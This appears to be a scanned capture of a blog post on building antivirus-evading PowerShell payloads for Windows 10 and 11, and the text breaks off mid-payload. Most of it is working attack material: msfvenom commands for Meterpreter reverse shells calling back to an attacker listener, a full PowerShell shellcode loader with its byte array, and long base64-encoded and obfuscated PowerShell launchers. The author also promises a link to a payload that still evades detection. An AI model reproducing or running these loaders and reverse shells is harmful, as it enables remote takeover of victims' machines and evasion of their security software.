infosecwriteups.com Open in urlscan Pro
162.159.152.4  Public Scan

Form analysis
0 forms found in the DOM

Text Content

Open in app

Sign In

Get started


Home
Notifications
Lists
Stories

--------------------------------------------------------------------------------

Write


Published in

InfoSec Write-ups

LeoX
Follow

Apr 30

·
6 min read
·

Listen



Save







UNDETECTABLE PAYLOAD FOR WINDOWS 10 AND 11



Firstly, to say I am not a professional ethical hacker, I am big enthusiast and
my hobie is hacking, and since long time Microsoft Windows security is one of my
favourite field. I was always seeking to be one step in front of their security,
and till now I am quite successful. Why I am pointing out that I am not a
professional; well can you imagine what one professional can do, if one
enthusiast can mess with their security.

In this story I will talk about how attackers are avoiding detection of their
viruses, and how security was get stronger and stronger during years. I will
also show you that even with big effort of antivirus software vendors, it is
still possible to create undetectable payload. And for the end I will give you
link to my github repository where you can find undetectable payload code, which
is sitting there in the wild for more than 2 years. I was shocked when I saw
yesterday that it is still working.

Ok, let we start. How to avoid detection is a question of every attacker. In
those days it is not easy to create payload which will avoid detection and
triggering alarm. All antivirus software vendors including microfoft defender
are putting big effort to protect users against threats, and each day they are
doing their job better and better. They are constantly updating the system of
detection and filling the databases with virus signatures. As soon as new virus
is shown in the wild it is just a matter of time when the patch is available.
From the other side also attackers are not sitting with the crossed hands. Ever
day they are looking for the new ways to avoid detection, they are compiling new
codes and recompiling existent codes with goal to avoid detection and
compromising the system. Remember, there is no protection which will 100%
protect you. This is never ending cat and mouse game between antivirus vendors
and attackers, and the game which will never end and where the attackers are
always one step in the lead.

In this post I will rely on the powershell scripting language, which is still
the best, most popular and common language for creating payload and compromising
windows operating system. Powershell is a task based command line shell and
scripting language built on .NET. powershell, which helps system administrators
and power users rapidly automate tasks that manage operating systems and
processes. But I should to mention and we need to take into account, that it is
just a matter of time when the game between powershell payloads and Microsoft
defender will end, since Microsoft is really putting big effort in defending the
system. Why, you will see in the further text.

In the further text I will show you how the payloads were creating in the past
and how are creating today, and also I will describe how the detection was
evolving in midtime.

In the past it was just enough that you used one line code in e.g. msfvenom
which was generated payload. But those times are far behind us.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe

or for raw powershell payload:

msfvenom –payload windows/meterpreter/reverse_http LHOST=192.168.1.104 LPORT=8080 –format psh –smallest –platform win –arch x86

which give you next output:

$KrJpyZMB = @”
[DllImport(“kernel32.dll”)]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(“kernel32.dll”)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
“@

$bvznJqWjba = Add-Type -memberDefinition $KrJpyZMB -Name “Win32” -namespace Win32Functions -passthru

[Byte[]] $zqiGAfUTkxCBu = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x3,0x53,0x53,0x68,0x90,0x1f,0x0,0x0,0xe8,0x9c,0x0,0x0,0x0,0x2f,0x31,0x73,0x41,0x4c,0x31,0x42,0x6d,0x36,0x30,0x36,0x59,0x31,0x46,0x6a,0x51,0x58,0x61,0x52,0x49,0x43,0x56,0x41,0x77,0x4e,0x62,0x77,0x6c,0x79,0x73,0x0,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x0,0x2,0x60,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0xa,0x5f,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x16,0x68,0x88,0x13,0x0,0x0,0x68,0x44,0xf0,0x35,0xe0,0xff,0xd5,0x4f,0x75,0xe1,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x68,0x0,0x0,0x40,0x0,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x0,0x20,0x0,0x0,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x7,0x1,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x7d,0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x2e,0x31,0x30,0x34,0x0

$VifvHnUwWmKQjn = $bvznJqWjba::VirtualAlloc(0,[Math]::Max($zqiGAfUTkxCBu.Length,0x1000),0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($zqiGAfUTkxCBu,0,$VifvHnUwWmKQjn,$zqiGAfUTkxCBu.Length)

$bvznJqWjba::CreateThread(0,0,$VifvHnUwWmKQjn,0,0,0)

But very soon basic creation of payloads was patched, so the attackers were
forced to find the new way. Soon they are figured out that encoding of payload
will avoid detection. Because of encoded payload windows defender and other
antivirus vendors did not know what is hiding behind the encoded string, so it
was easily compromised the system.

Here are few examples of encoded payloads created with different payload
generators.

Payload created with msfvenom:

Take a note that in that case was used base64 encoder which is not installed in
metasploit by default.

msfvenom –payload windows/meterpreter/reverse_http LHOST=192.168.1.104 LPORT=8080 –format psh –smallest | msfvenom –payload – –platform win –arch x86 –encoder base64 NOEXIT SYSWOW6c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoExit -EncodedCommand JABHAGwAeQBaAEgAVQBsAEkAVgBkAEgAcgAgAD0AIABAACIADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAIgBAAA0ACgANAAoAJABaAGoAQgBJAEcARQBkAFMAeABmAG4AQgBmAFkAUgAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEcAbAB5AFoASABVAGwASQBWAGQASAByACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQANAAoADQAKAFsAQgB5AHQAZQBbAF0AXQAgACQARgB3AFgAZgBLAHoAYwB6AHIAaAByAG4AZgAgAD0AIAAwAHgAZgBjACwAMAB4AGUAOAAsADAAeAA4ADIALAAwAHgAMAAsADAAeAAwACwAMAB4ADAALAAwAHgANgAwACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeAA2ADQALAAwAHgAOABiACwAMAB4ADUAMAAsADAAeAAzADAALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4AGYALAAwAHgAYgA3ACwAMAB4ADQAYQAsADAAeAAyADYALAAwAHgAMwAxACwAMAB4AGYAZgAsADAAeABhAGMALAAwAHgAMwBjACwAMAB4ADYAMQAsADAAeAA3AGMALAAwAHgAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAZAAsADAAeAAxACwAMAB4AGMANwAsADAAeABlADIALAAwAHgAZgAyACwAMAB4ADUAMgAsADAAeAA1ADcALAAwAHgAOABiACwAMAB4ADUAMgAsADAAeAAxADAALAAwAHgAOABiACwAMAB4ADQAYQAsADAAeAAzAGMALAAwAHgAOABiACwAMAB4ADQAYwAsADAAeAAxADEALAAwAHgANwA4ACwAMAB4AGUAMwAsADAAeAA0ADgALAAwAHgAMQAsADAAeABkADEALAAwAHgANQAxACwAMAB4ADgAYgAsADAAeAA1ADkALAAwAHgAMgAwACwAMAB4ADEALAAwAHgAZAAzACwAMAB4ADgAYgAsADAAeAA0ADkALAAwAHgAMQA4ACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiACwAMAB4ADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAZAAsADAAeAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADYALAAwAHgAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADQALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAYwAsADAAeAA0AGIALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAxAGMALAAwAHgAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADQALAAwAHgAOABiACwAMAB4ADEALAAwAHgAZAAwACwAMAB4ADgAOQAsADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAAwAHgAZQBiACwAMAB4ADgAZAAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADYAZQAsADAAeAA2ADUALAAwAHgANwA0ACwAMAB4ADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA2ADkALAAwAHgANgBlACwAMAB4ADYAOQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADMAYQAsADAAeAA1ADYALAAwAHgANwA5ACwAMAB4AGEANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAOQAwACwAMAB4ADEAZgAsADAAeAAwACwAMAB4ADAALAAwAHgAZQA4ACwAMAB4ADkAYwAsADAAeAAwACwAMAB4ADAALAAwAHgAMAAsADAAeAAyAGYALAAwAHgANgBjACwAMAB4ADQAMwAsADAAeAA2AGIALAAwAHgANAA1ACwAMAB4ADYAMwAsADAAeAAzADUALAAwAHgANgAxACwAMAB4ADQANgAsADAAeAA3ADgALAAwAHgANQA0ACwAMAB4ADQAOQAsADAAeAA0ADEALAAwAHgANQA5ACwAMAB4ADQAMQAsADAAeAA0ADYALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeAA0ADcALAAwAHgANQAxACwAMAB4ADUAZgAsADAAeAAzADgALAAwAHgANAAxACwAMAB4ADMAMwAsADAAeAAzADQALAAwAHgANAA2ACwAMAB4ADQANAAsADAAeAA3ADYALAAwAHgANwA5ACwAMAB4ADcAOAAsADAAeAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgANQA3ACwAMAB4ADgAOQAsADAAeAA5AGYALAAwAHgAYwA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOAA5ACwAMAB4AGMANgAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADAALAAwAHgAMgAsADAAeAA2ADAALAAwAHgAOAA0ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANwAsADAAeAA1ADMALAAwAHgANQA2ACwAMAB4ADYAOAAsADAAeABlAGIALAAwAHgANQA1ACwAMAB4ADIAZQAsADAAeAAzAGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADYALAAwAHgANgBhACwAMAB4AGEALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADIAZAAsADAAeAA2ACwAMAB4ADEAOAAsADAAeAA3AGIALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeAAxADYALAAwAHgANgA4ACwAMAB4ADgAOAAsADAAeAAxADMALAAwAHgAMAAsADAAeAAwACwAMAB4ADYAOAAsADAAeAA0ADQALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA0AGYALAAwAHgANwA1ACwAMAB4AGUAMQAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAsADAAeAAxADAALAAwAHgAMAAsADAAeAAwACwAMAB4ADYAOAAsADAAeAAwACwAMAB4ADAALAAwAHgANAAwACwAMAB4ADAALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAsADAAeAAyADAALAAwAHgAMAAsADAAeAAwACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADEAMgAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgANwAsADAAeAAxACwAMAB4AGMAMwAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeABlADUALAAwAHgANQA4ACwAMAB4AGMAMwAsADAAeAA1AGYALAAwAHgAZQA4ACwAMAB4ADcAZAAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAMwA5ACwAMAB4ADMAMgAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMANgAsADAAeAAzADgALAAwAHgAMgBlACwAMAB4ADMAMQAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMAMAAsADAAeAAzADQALAAwAHgAMAANAAoADQAKAA0ACgAkAGsAVwBpAFAAYgB4AFIATwBlAFoAaQBKAHAASQBRACAAPQAgACQAWgBqAEIASQBHAEUAZABTAHgAZgBuAEIAZgBZAFIAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsAFsATQBhAHQAaABdADoAOgBNAGEAeAAoACQARgB3AFgAZgBLAHoAYwB6AHIAaAByAG4AZgAuAEwAZQBuAGcAdABoACwAMAB4ADEAMAAwADAAKQAsADAAeAAzADAAMAAwACwAMAB4ADQAMAApAA0ACgANAAoAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAQwBvAHAAeQAoACQARgB3AFgAZgBLAHoAYwB6AHIAaAByAG4AZgAsADAALAAkAGsAVwBpAFAAYgB4AFIATwBlAFoAaQBKAHAASQBRACwAJABGAHcAWABmAEsAegBjAHoAcgBoAHIAbgBmAC4ATABlAG4AZwB0AGgAKQANAAoADQAKACQAWgBqAEIASQBHAEUAZABTAHgAZgBuAEIAZgBZAFIAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGsAVwBpAFAAYgB4AFIATwBlAFoAaQBKAHAASQBRACwAMAAsADAALAAwACkADQAKAA==4

Payload created with TheFatRat:

powershell -w 1 -C “sv di -;sv qG ec;sv Foj ((gv di).value.toString()+(gv qG).value.toString());powershell (gv Foj).value.toString() ‘JABqAEYARgAgAD0AIAAnACQATABaAHQAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQATABaAHQAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgA4ACwAMAB4ADgAZAAsADAAeAAwADUALAAwAHgAYgBmACwAMAB4ADAAMgAsADAAeABkAGEALAAwAHgAZAAyACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQBiACwAMAB4ADgAMwAsADAAeABjADIALAAwAHgAMAA0ACwAMAB4ADMAMQAsADAAeAA0ADIALAAwAHgAMABmACwAMAB4ADAAMwAsADAAeAA0ADIALAAwAHgAOAAyACwAMAB4AGUANwAsADAAeAA0AGEALAAwAHgAZgBlACwAMAB4ADcANAAsADAAeAA2ADUALAAwAHgAYgA0ACwAMAB4AGYAZgAsADAAeAA4ADQALAAwAHgAMABhACwAMAB4ADMAYwAsADAAeAAxAGEALAAwAHgAYgA1ACwAMAB4ADAAYQAsADAAeAA1AGEALAAwAHgANgBlACwAMAB4AGUANQAsADAAeABiAGEALAAwAHgAMgA4ACwAMAB4ADIAMgAsADAAeAAwADkALAAwAHgAMwAwACwAMAB4ADcAYwAsADAAeABkADcALAAwAHgAOQBhACwAMAB4ADMANAAsADAAeABhADkALAAwAHgAZAA4ACwAMAB4ADIAYgAsADAAeABmADIALAAwAHgAOABmACwAMAB4AGQANwAsADAAeABhAGMALAAwAHgAYQBmACwAMAB4AGUAYwAsADAAeAA3ADYALAAwAHgAMgBlACwAMAB4AGIAMgAsADAAeAAyADAALAAwAHgANQA5ACwAMAB4ADAAZgAsADAAeAA3AGQALAAwAHgAMwA1ACwAMAB4ADkAOAAsADAAeAA0ADgALAAwAHgANgAwACwAMAB4AGIANAAsADAAeABjADgALAAwAHgAMAAxACwAMAB4AGUAZQAsADAAeAA2AGIALAAwAHgAZgBkACwAMAB4ADIANgAsADAAeABiAGEALAAwAHgAYgA3ACwAMAB4ADcANgAsADAAeAA3ADQALAAwAHgAMgBhACwAMAB4AGIAMAAsADAAeAA2AGIALAAwAHgAYwBjACwAMAB4ADQAZAAsADAAeAA5ADEALAAwAHgAMwBkACwAMAB4ADQANwAsADAAeAAxADQALAAwAHgAMwAxACwAMAB4AGIAZgAsADAAeAA4ADQALAAwAHgAMgBjACwAMAB4ADcAOAAsADAAeABhADcALAAwAHgAYwA5ACwAMAB4ADAAOQAsADAAeAAzADIALAAwAHgANQBjACwAMAB4ADMAOQAsADAAeABlADUALAAwAHgAYwA1ACwAMAB4AGIANAAsADAAeAA3ADAALAAwAHgAMAA2ACwAMAB4ADYAOQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4AGYANQAsADAAeAA3ADMALAAwAHgAMwBkACwAMAB4ADcAOQAsADAAeABlADYALAAwAHgAMAAxACwAMAB4ADMANwAsADAAeAA3AGEALAAwAHgAOQBiACwAMAB4ADEAMQAsADAAeAA4AGMALAAwAHgAMAAxACwAMAB4ADQANwAsADAAeAA5ADcALAAwAHgAMQA3ACwAMAB4AGEAMQAsADAAeAAwAGMALAAwAHgAMABmACwAMAB4AGYAYwAsADAAeAA1ADAALAAwAHgAYwAwACwAMAB4AGQANgAsADAAeAA3ADcALAAwAHgANQBlACwAMAB4AGEAZAAsADAAeAA5AGQALAAwAHgAZAAwACwAMAB4ADQAMgAsADAAeAAzADAALAAwAHgANwAxACwAMAB4ADYAYgAsADAAeAA3AGUALAAwAHgAYgA5ACwAMAB4ADcANAAsADAAeABiAGMALAAwAHgAZgA3ACwAMAB4AGYAOQAsADAAeAA1ADIALAAwAHgAMQA4ACwAMAB4ADUAYwAsADAAeAA1ADkALAAwAHgAZgBhACwAMAB4ADMAOQAsADAAeAAzADgALAAwAHgAMABjACwAMAB4ADAAMwAsADAAeAA1ADkALAAwAHgAZQAzACwAMAB4AGYAMQAsADAAeABhADEALAAwAHgAMQAxACwAMAB4ADAAOQAsADAAeABlADUALAAwAHgAZABiACwAMAB4ADcAYgAsADAAeAA0ADUALAAwAHgAOQA3ACwAMAB4ADgANgAsADAAeABmADcALAAwAHgAOQA1ACwAMAB4ADAAZgAsADAAeAAzAGUALAAwAHgAOQAxACwAMAB4AGYAYgAsADAAeABhADYALAAwAHgAOQA0ACwAMAB4ADAAOQAsADAAeAA0AGYALAAwAHgANABlACwAMAB4ADMAMwAsADAAeABjAGQALAAwAHgAYgAwACwAMAB4ADYANQAsADAAeAAwAGEALAAwAHgAMABhACwAMAB4ADEAZAAsADAAeABkADUALAAwAHgAMwBlACwAMAB4AGYAZgAsADAAeABmADIALAAwAHgAYgAxACwAMAB4AGYAYQAsADAAeABhADkALAAwAHgAOABkACwAMAB4AGUANgAsADAAeAAwADQALAAwAHgAOAAwACwAMAB4ADMAZQAsADAAeABiAGEALAAwAHgAOQAwACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANgBmACwAMAB4ADAAZAAsADAAeAA3ADMALAAwAHgAMAAyACwAMAB4ADkAMAAsADAAeABjAGQALAAwAHgANgAzACwAMAB4AGIAOAAsADAAeAA5ADAALAAwAHgAYwBkACwAMAB4ADcAMwAsADAAeABlAGYALAAwAHgAZAA1ACwAMAB4AGEAYgAsADAAeAAyADMALAAwAHgAYgBlACwAMAB4AGUAMQAsADAAeAA0ADQALAAwAHgAOQA2ACwAMAB4ADcAOAAsADAAeAA0ADUALAAwAHgAOQAyACwAMAB4ADQAZgAsADAAeAAxADQALAAwAHgAMwBmACwAMAB4ADgAZAAsADAAeAAzAGQALAAwAHgAYgBiACwAMAB4AGQAYQAsADAAeAAxADUALAAwAHgAYQBkACwAMAB4ADIANQAsADAAeAA1AGYALAAwAHgAYwAxACwAMAB4ADUAZQAsADAAeABjAGEALAAwAHgAYwBhACwAMAB4ADYAOAAsADAAeABlADIALAAwAHgANQA5ACwAMAB4ADgAMgAsADAAeAA3ADIALAAwAHgAYgA0ACwAMAB4ADAAOQAsADAAeAAzAGIALAAwAHgAZgBhACwAMAB4AGEAYgAsADAAeAAwAGYALAAwAHgAMwBjACwAMAB4ADIAOQAsADAAeAA1AGEALAAwAHgANAA5ACwAMAB4ADkAMAAsADAAeABiAGEALAAwAHgANQBkACwAMAB4ADUANwAsADAAeAA3ADcALAAwAHgAYgBmACwAMAB4ADAAZAAsADAAeAAwADQALAAwAHgAMgA0ACwAMAB4AGUAOAAsADAAeABlADIALAAwAHgAZgBjACwAMAB4AGEAMgAsADAAeABmAGQALAAwAHgANQAwACwAMAB4ADIAZQAsADAAeAAwADgALAAwAHgAZgBkACwAMAB4ADgAZQAsADAAeABiADgALAAwAHgAMAA0ACwAMAB4ADAAYgAsADAAeAA2AGUALAAwAHgAOQA3ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAYwAzACwAMAB4ADQAMQAsADAAeAA0ADQALAAwAHgANwAyACwAMAB4AGUANQAsADAAeAA3ADUALAAwAHgAZQBmACwAMAB4ADcAMwAsADAAeAAzAGMALAAwAHgAMAAwACwAMAB4AGMAZgAsADAAeABmADkALAAwAHgAYQA5ACwAMAB4ADYAMgAsADAAeAA1ADgALAAwAHgAMQAyACwAMAB4AGQANgAsADAAeAA3ADIALAAwAHgAMwAwACwAMAB4ADUAMQAsADAAeAAyADYALAAwAHgANAA3ACwAMAB4ADIAMAAsADAAeABhADYALAAwAHgAMQAzACwAMAB4AGUAOAAsADAAeABkADUALAAwAHgAYgA4ACwAMAB4AGYANAAsADAAeAAwADYALAAwAHgAYQAwACwAMAB4ADkAOQAsADAAeAA1ADMALAAwAHgAMQA5ACwAMAB4ADEAZQAsADAAeABiADcALAAwAHgAMQBiACwAMAB4ADgAZ